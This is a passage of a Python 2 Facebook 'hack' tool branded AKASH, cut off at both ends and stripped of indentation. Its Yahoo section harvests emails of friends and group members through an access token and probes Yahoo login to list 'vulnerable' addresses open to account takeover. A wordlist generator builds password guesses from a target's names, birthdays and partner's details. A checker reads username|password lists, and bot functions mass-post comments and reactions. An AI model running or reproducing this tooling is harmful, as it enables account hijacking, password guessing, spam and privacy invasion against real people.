print "\033[1;97m║AKASH--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
yahoo_pilih()
#----pilih
def yahoo_pilih():
go = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if go =="":
print "\033[1;91m[!] Wrong"
yahoo_pilih()
elif go =="1":
yahoofriends()
elif go =="2":
yahoofromfriends()
elif go =="3":
yahoomember()
elif go =="4":
yahoolist()
elif go =="0":
menu_hack()
else:
print "\033[1;91m[!] Wrong"
yahoo_pilih()
##### LIST FRIEND #####
def yahoofriends():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
mpsh = []
jml = 0
jalan('\033[1;91m[AKASH] \033[1;92mGetting email friend \033[1;97m...')
teman = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
kimak = json.loads(teman.text)
save = open('out/MailVuln.txt','w')
jalan('\033[1;91m[AKASH] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" +mail+" \033[1;97m=>"+nama)
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;91m[+] \033[1;92mFile saved \033[1;91m:\033[1;97m out/MailVuln.txt"
save.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
##### CLONE FROM FRIEND #####
def yahoofromfriends():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
mpsh = []
jml = 0
idt = raw_input("\033[1;91m[+] \033[1;92mInput ID friend \033[1;91m: \033[1;97m")
try:
jok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+toket)
op = json.loads(jok.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom\033[1;91m :\033[1;97m "+op["name"]
except KeyError:
print"\033[1;91m[!] Friend not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
jalan('\033[1;91m[✺] \033[1;92mGetting email from friend \033[1;97m...')
teman = requests.get('https://graph.facebook.com/'+idt+'/friends?access_token='+toket)
kimak = json.loads(teman.text)
save = open('out/FriendMailVuln.txt','w')
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" +mail+" \033[1;97m=>"+nama)
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;91m[+] \033[1;92mFile saved \033[1;91m:\033[1;97m out/FriendMailVuln.txt"
save.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
##### YAHOO MEMBER #####
def yahoomember():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
mpsh = []
jml = 0
id=raw_input('\033[1;91m[+] \033[1;92mInput ID group \033[1;91m:\033[1;97m ')
try:
r=requests.get('https://graph.facebook.com/group/?id='+id+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
jalan('\033[1;91m[✺] \033[1;92mGetting email from group \033[1;97m...')
teman = requests.get('https://graph.facebook.com/'+id+'/members?fields=name,id&limit=999999999&access_token='+toket)
kimak = json.loads(teman.text)
save = open('out/GrupMailVuln.txt','w')
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for w in kimak['data']:
jml +=1
mpsh.append(jml)
id = w['id']
nama = w['name']
links = requests.get("https://graph.facebook.com/"+id+"?access_token="+toket)
z = json.loads(links.text)
try:
mail = z['email']
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" +mail+" \033[1;97m=>"+nama)
berhasil.append(mail)
except KeyError:
pass
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;91m[+] \033[1;92mFile saved \033[1;91m:\033[1;97m out/GrupMailVuln.txt"
save.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
##### YAHOO FILE #####
def yahoolist():
global toket
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
try:
os.mkdir('out')
except OSError:
pass
os.system('reset')
print logo
files = raw_input("\033[1;91m[+] \033[1;92mFile path \033[1;91m: \033[1;97m")
try:
total = open(files,"r")
mail = total.readlines()
except IOError:
print"\033[1;91m[!] File not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
mpsh = []
jml = 0
jalan('\033[1;91m[✺] \033[1;92mStart \033[1;97m...')
save = open('out/FileMailVuln.txt','w')
print 42*"\033[1;97m═"
mail = open(files,"r").readlines()
for pw in mail:
mail = pw.replace("\n","")
jml +=1
mpsh.append(jml)
yahoo = re.compile(r'@.*')
otw = yahoo.search(mail).group()
if 'yahoo.com' in otw:
br.open("https://login.yahoo.com/config/login?.src=fpctx&.intl=id&.lang=id-ID&.done=https://id.yahoo.com")
br._factory.is_html = True
br.select_form(nr=0)
br["username"] = mail
klik = br.submit().read()
jok = re.compile(r'"messages.ERROR_INVALID_USERNAME">.*')
try:
pek = jok.search(klik).group()
except:
continue
if '"messages.ERROR_INVALID_USERNAME">' in pek:
save.write(mail + '\n')
print("\033[1;97m[ \033[1;92mVULN✓\033[1;97m ] \033[1;92m" +mail)
berhasil.append(mail)
print 42*"\033[1;97m═"
print '\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mDone \033[1;97m....'
print"\033[1;91m[+] \033[1;92mTotal \033[1;91m: \033[1;97m"+str(len(berhasil))
print"\033[1;91m[+] \033[1;92mFile saved \033[1;91m:\033[1;97m out/FileMailVuln.txt"
save.close()
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_yahoo()
##### MENU BOT #####
#----------------------------------------#
def menu_bot():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m1.\033[1;97m Bot Reactions Target Post"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m2.\033[1;97m Bot Reactions Grup Post"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m3.\033[1;97m Bot Komen Target Post"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m4.\033[1;97m Bot Komen Grup Post"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m5.\033[1;97m Mass delete Post"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m6.\033[1;97m Mass accept friend"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m7.\033[1;97m Mass delete friend"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
bot_pilih()
#////////////
def bot_pilih():
bots = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if bots =="":
print "\033[1;91m[!] Wrong input"
bot_pilih()
elif bots =="1":
menu_react()
elif bots =="2":
grup_react()
elif bots =="3":
bot_komen()
elif bots =="4":
grup_komen()
elif bots =="5":
deletepost()
elif bots =="6":
accept()
elif bots =="7":
unfriend()
elif bots =="0":
menu()
else:
print "\033[1;91m[!] Wrong input"
bot_pilih()
##### MENU REACT #####
def menu_react():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(1)
login()
os.system('reset')
print logo
print ("\033[1;97m║AKASH--\033[1;91m> \033[1;92m1. \033[1;97mLike")
print ("\033[1;97m║AKASH--\033[1;91m> \033[1;92m2. \033[1;97mLove")
print ("\033[1;97m║AKASH--\033[1;91m> \033[1;92m3. \033[1;97mWow")
print ("\033[1;97m║AKASH--\033[1;91m> \033[1;92m4. \033[1;97mHaha")
print ("\033[1;97m║AKASH--\033[1;91m> \033[1;92m5. \033[1;97mSadBoy")
print ("\033[1;97m║AKASH--\033[1;91m> \033[1;92m6. \033[1;97mAngry")
print "\033[1;97m║AKASH--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
react_pilih()
#//////////////
def react_pilih():
global tipe
aksi = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if aksi =="":
print "\033[1;91m[!] Wrong input"
react_pilih()
elif aksi =="1":
tipe = "LIKE"
react()
elif aksi =="2":
tipe = "LOVE"
react()
elif aksi =="3":
tipe = "WOW"
react()
elif aksi =="4":
tipe = "HAHA"
react()
elif aksi =="5":
tipe = "SAD"
react()
elif aksi =="6":
tipe = "ANGRY"
react()
elif aksi =="0":
menu_bot()
else:
print "\033[1;91m[!] Wrong input"
react_pilih()
#####NEXT
def react():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('reset')
print logo
ide = raw_input('\033[1;91m[+] \033[1;92mInput ID Target \033[1;91m:\033[1;97m ')
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
try:
oh = requests.get("https://graph.facebook.com/"+ide+"?fields=feed.limit("+limit+")&access_token="+toket)
ah = json.loads(oh.text)
jalan('\033[1;91m[AKASH] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for a in ah['feed']['data']:
y = a['id']
reaksi.append(y)
requests.post("https://graph.facebook.com/"+y+"/reactions?type="+tipe+"&access_token="+toket)
print '\033[1;92m[\033[1;97m'+y[:10].replace('\n',' ')+'... \033[1;92m] \033[1;97m'+tipe
print 42*"\033[1;97m═"
print "\r\033[1;91m[+]\033[1;92m Done \033[1;97m"+str(len(reaksi))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
except KeyError:
print"\033[1;91m[!] ID not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### BOT REACT GRUP #####
def grup_react():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('reset')
print logo
print ("\033[1;97m║AKASH--\033[1;91m> \033[1;92m1. \033[1;97mLike")
print ("\033[1;97m║AKASH--\033[1;91m> \033[1;92m2. \033[1;97mLove")
print ("\033[1;97m║AKASH--\033[1;91m> \033[1;92m3. \033[1;97mWow")
print ("\033[1;97m║AKASH--\033[1;91m> \033[1;92m4. \033[1;97mHaha")
print ("\033[1;97m║AKASH--\033[1;91m> \033[1;92m5. \033[1;97mSadBoy")
print ("\033[1;97m║AKASH--\033[1;91m> \033[1;92m6. \033[1;97mAngry")
print "\033[1;97m║AKASH--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
reactg_pilih()
#//////////////
def reactg_pilih():
global tipe
aksi = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if aksi =="":
print "\033[1;91m[!] Wrong input"
reactg_pilih()
elif aksi =="1":
tipe = "LIKE"
reactg()
elif aksi =="2":
tipe = "LOVE"
reactg()
elif aksi =="3":
tipe = "WOW"
reactg()
elif aksi =="4":
tipe = "HAHA"
reactg()
elif aksi =="5":
tipe = "SAD"
reactg()
elif aksi =="6":
tipe = "ANGRY"
reactg()
elif aksi =="0":
menu_bot()
else:
print "\033[1;91m[!] Wrong input"
reactg_pilih()
#####NEXT
def reactg():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('reset')
print logo
ide = raw_input('\033[1;91m[+] \033[1;92mInput ID Group \033[1;91m:\033[1;97m ')
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
try:
r=requests.get('https://graph.facebook.com/group/?id='+ide+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
grup_react()
try:
oh = requests.get("https://graph.facebook.com/v3.0/"+ide+"?fields=feed.limit("+limit+")&access_token="+toket)
ah = json.loads(oh.text)
jalan('\033[1;91m[AKASH] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for a in ah['feed']['data']:
y = a['id']
reaksigrup.append(y)
requests.post("https://graph.facebook.com/"+y+"/reactions?type="+tipe+"&access_token="+toket)
print '\033[1;92m[\033[1;97m'+y[:10].replace('\n',' ')+'... \033[1;92m] \033[1;97m'+tipe
print 42*"\033[1;97m═"
print "\r\033[1;91m[+]\033[1;92m Done \033[1;97m"+str(len(reaksigrup))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
except KeyError:
print"\033[1;91m[!] ID not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### BOT KOMEN #####
def bot_komen():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('reset')
print logo
print "\033[1;91m[!] \033[1;92mUse \033[1;97m'<>' \033[1;92mfor new lines"
ide = raw_input('\033[1;91m[+] \033[1;92mID Target \033[1;91m:\033[1;97m ')
km = raw_input('\033[1;91m[+] \033[1;92mComment \033[1;91m:\033[1;97m ')
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
km=km.replace('<>','\n')
try:
p = requests.get("https://graph.facebook.com/"+ide+"?fields=feed.limit("+limit+")&access_token="+toket)
a = json.loads(p.text)
jalan('\033[1;91m[AKASH] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for s in a['feed']['data']:
f = s['id']
komen.append(f)
requests.post("https://graph.facebook.com/"+f+"/comments?message="+km+"&access_token="+toket)
print '\033[1;92m[\033[1;97m'+km[:10].replace('\n',' ')+'... \033[1;92m]'
print 42*"\033[1;97m═"
print "\r\033[1;91m[+]\033[1;92m Done \033[1;97m"+str(len(komen))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
except KeyError:
print"\033[1;91m[!] ID not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### BOT KOMEN GRUP #####
def grup_komen():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('reset')
print logo
print "\033[1;91m[!] \033[1;92mUse \033[1;97m'<>' \033[1;92mfor new lines"
ide = raw_input('\033[1;91m[+] \033[1;92mID Group \033[1;91m:\033[1;97m ')
km = raw_input('\033[1;91m[+] \033[1;92mComment \033[1;91m:\033[1;97m ')
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
km=km.replace('<>','\n')
try:
r=requests.get('https://graph.facebook.com/group/?id='+ide+'&access_token='+toket)
asw=json.loads(r.text)
print"\033[1;91m[\033[1;96m✓\033[1;91m] \033[1;92mFrom group \033[1;91m:\033[1;97m "+asw['name']
except KeyError:
print"\033[1;91m[!] Group not found"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
try:
p = requests.get("https://graph.facebook.com/v3.0/"+ide+"?fields=feed.limit("+limit+")&access_token="+toket)
a = json.loads(p.text)
jalan('\033[1;91m[AKASH] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for s in a['feed']['data']:
f = s['id']
komengrup.append(f)
requests.post("https://graph.facebook.com/"+f+"/comments?message="+km+"&access_token="+toket)
print '\033[1;92m[\033[1;97m'+km[:10].replace('\n',' ')+'... \033[1;92m]'
print 42*"\033[1;97m═"
print "\r\033[1;91m[+]\033[1;92m Done \033[1;97m"+str(len(komengrup))
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
except KeyError:
print"\033[1;91m[!] Error"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### HAPUS POST #####
def deletepost():
os.system('reset')
try:
toket=open('login.txt','r').read()
nam = requests.get('https://graph.facebook.com/me?access_token='+toket)
lol = json.loads(nam.text)
nama = lol['name']
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('reset')
print logo
print("\033[1;91m[+] \033[1;92mFrom \033[1;91m: \033[1;97m%s"%nama)
jalan("\033[1;91m[+] \033[1;92mStart\033[1;97m ...")
print 42*"\033[1;97m═"
asu = requests.get('https://graph.facebook.com/me/feed?access_token='+toket)
asus = json.loads(asu.text)
for p in asus['data']:
id = p['id']
piro = 0
url = requests.get('https://graph.facebook.com/'+id+'?method=delete&access_token='+toket)
ok = json.loads(url.text)
try:
error = ok['error']['message']
print '\033[1;91m[\033[1;97m'+id[:10].replace('\n',' ')+'...'+'\033[1;91m] \033[1;95mFailed'
except TypeError:
print '\033[1;92m[\033[1;97m'+id[:10].replace('\n',' ')+'...'+'\033[1;92m] \033[1;96mDeleted'
piro += 1
except requests.exceptions.ConnectionError:
print"\033[1;91m[!] Connection Error"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mDone"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### ACCEPT FRIEND #####
def accept():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('reset')
print logo
limit = raw_input("\033[1;91m[!] \033[1;92mLimit \033[1;91m:\033[1;97m ")
r = requests.get('https://graph.facebook.com/me/friendrequests?limit='+limit+'&access_token='+toket)
teman = json.loads(r.text)
if '[]' in str(teman['data']):
print"\033[1;91m[!] No friend request"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
jalan('\033[1;91m[AKASH] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for i in teman['data']:
gas = requests.post('https://graph.facebook.com/me/friends/'+i['from']['id']+'?access_token='+toket)
a = json.loads(gas.text)
if 'error' in str(a):
print "\033[1;97m[ \033[1;91mFailed\033[1;97m ] "+i['from']['name']
else:
print "\033[1;97m[ \033[1;92mAccept\033[1;97m ] "+i['from']['name']
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mDone"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
##### UNFRIEND ####
def unfriend():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('reset')
print logo
jalan('\033[1;91m[AKASH] \033[1;92mStart \033[1;97m...')
print "\033[1;97mStop \033[1;91mCTRL+C"
print 42*"\033[1;97m═"
try:
pek = requests.get('https://graph.facebook.com/me/friends?access_token='+toket)
cok = json.loads(pek.text)
for i in cok['data']:
nama = i['name']
id = i['id']
requests.delete("https://graph.facebook.com/me/friends?uid="+id+"&access_token="+toket)
print "\033[1;97m[\033[1;92m Deleted \033[1;97m] "+nama
except IndexError: pass
except KeyboardInterrupt:
print "\033[1;91m[!] Stopped"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
print"\n\033[1;91m[+] \033[1;92mDone"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
menu_bot()
#### LAIN LAIN #####
# #
####MENU LAIN#####
def lain():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('reset')
print logo
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m1.\033[1;97m Create Post"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m2.\033[1;97m Create Wordlist"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m3.\033[1;97m Account Checker"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m4.\033[1;97m See my group list"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;92m5.\033[1;97m Profile Guard"
print "\033[1;97m║AKASH--\033[1;91m> \033[1;91m0.\033[1;97m Back"
print "║"
pilih_lain()
#////////////
def pilih_lain():
other = raw_input("\033[1;97m╚═\033[1;91mD \033[1;97m")
if other =="":
print "\033[1;91m[!] Wrong input"
pilih_lain()
elif other =="1":
status()
elif other =="2":
wordlist()
elif other =="3":
check_akun()
elif other =="4":
grupsaya()
elif other =="5":
guard()
elif other =="0":
menu()
else:
print "\033[1;91m[!] Wrong input"
pilih_lain()
##### STATUS #####
def status():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('reset')
print logo
msg=raw_input('\033[1;91m[+] \033[1;92mType status \033[1;91m:\033[1;97m ')
if msg == "":
print "\033[1;91m[!] Don't be empty"
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
else:
res = requests.get("https://graph.facebook.com/me/feed?method=POST&message="+msg+"&access_token="+toket)
op = json.loads(res.text)
jalan('\033[1;91m[AKASH] \033[1;92mCreate \033[1;97m...')
print 42*"\033[1;97m═"
print"\033[1;91m[+] \033[1;92mStatus ID\033[1;91m : \033[1;97m"+op['id']
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
########### CREATE WORDLIST ##########
def wordlist():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
try:
os.system('reset')
print logo
print "\033[1;91m[?] \033[1;92mFill in the complete data of the target below"
print 42*"\033[1;97m═"
a = raw_input("\033[1;91m[+] \033[1;92mNama Depan \033[1;97m: ")
file = open(a+".txt", 'w')
b=raw_input("\033[1;91m[+] \033[1;92mNama Tengah \033[1;97m: ")
c=raw_input("\033[1;91m[+] \033[1;92mNama Belakang \033[1;97m: ")
d=raw_input("\033[1;91m[+] \033[1;92mNama Panggilan \033[1;97m: ")
e=raw_input("\033[1;91m[+] \033[1;92mTanggal Lahir >\033[1;96mex: |DDMMYY| \033[1;97m: ")
f=e[0:2]
g=e[2:4]
h=e[4:]
print 42*"\033[1;97m═"
print("\033[1;91m[?] \033[1;93mKalo Jomblo SKIP aja :v")
i=raw_input("\033[1;91m[+] \033[1;92mNama Pacar \033[1;97m: ")
j=raw_input("\033[1;91m[+] \033[1;92mNama Panggilan Pacar \033[1;97m: ")
k=raw_input("\033[1;91m[+] \033[1;92mTanggal Lahir Pacar >\033[1;96mex: |DDMMYY| \033[1;97m: ")
jalan('\033[1;91m[AKASH] \033[1;92mCreate \033[1;97m...')
l=k[0:2]
m=k[2:4]
n=k[4:]
file.write("%s%s\n%s%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s\n%s%s" % (a,c,a,b,b,a,b,c,c,a,c,b,a,a,b,b,c,c,a,d,b,d,c,d,d,d,d,a,d,b,d,c,a,e,a,f,a,g,a,h,b,e,b,f,b,g,b,h,c,e,c,f,c,g,c,h,d,e,d,f,d,g,d,h,e,a,f,a,g,a,h,a,e,b,f,b,g,b,h,b,e,c,f,c,g,c,h,c,e,d,f,d,g,d,h,d,d,d,a,f,g,a,g,h,f,g,f,h,f,f,g,f,g,h,g,g,h,f,h,g,h,h,h,g,f,a,g,h,b,f,g,b,g,h,c,f,g,c,g,h,d,f,g,d,g,h,a,i,a,j,a,k,i,e,i,j,i,k,b,i,b,j,b,k,c,i,c,j,c,k,e,k,j,a,j,b,j,c,j,d,j,j,k,a,k,b,k,c,k,d,k,k,i,l,i,m,i,n,j,l,j,m,j,n,j,k))
wg = 0
while (wg < 100):
wg = wg + 1
file.write(a + str(wg) + '\n')
en = 0
while (en < 100):
en = en + 1
file.write(i + str(en) + '\n')
word = 0
while (word < 100):
word = word + 1
file.write(d + str(word) + '\n')
gen = 0
while (gen < 100):
gen = gen + 1
file.write(j + str(gen) + '\n')
file.close()
time.sleep(1.5)
print 42*"\033[1;97m═"
print ("\033[1;91m[+] \033[1;92mSaved \033[1;91m: \033[1;97m %s.txt" %a)
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
except IOError, e:
print("\033[1;91m[!] Failed")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
##### CHECKER #####
def check_akun():
os.system('reset')
try:
toket=open('login.txt','r').read()
except IOError:
print"\033[1;91m[!] Token not found"
os.system('rm -rf login.txt')
time.sleep(0.01)
login()
os.system('reset')
print logo
print "\033[1;91m[?] \033[1;92mCreate in file\033[1;91m : \033[1;97musername|password"
print 42*"\033[1;97m═"
live = []
cek = []
die = []
try:
file = raw_input("\033[1;91m[+] \033[1;92mFile path \033[1;91m:\033[1;97m ")
list = open(file,'r').readlines()
except IOError:
print ("\033[1;91m[!] File not found")
raw_input("\n\033[1;91m[ \033[1;97mBack \033[1;91m]")
lain()
pemisah = raw_input("\033[1;91m[+] \033[1;92mSeparator \033[1;91m:\033[1;97m ")
jalan('\033[1;91m[AKASH] \033[1;92mStart \033[1;97m...')
print 42*"\033[1;97m═"
for meki in list:
username, password = (meki.strip()).split(str(pemisah))
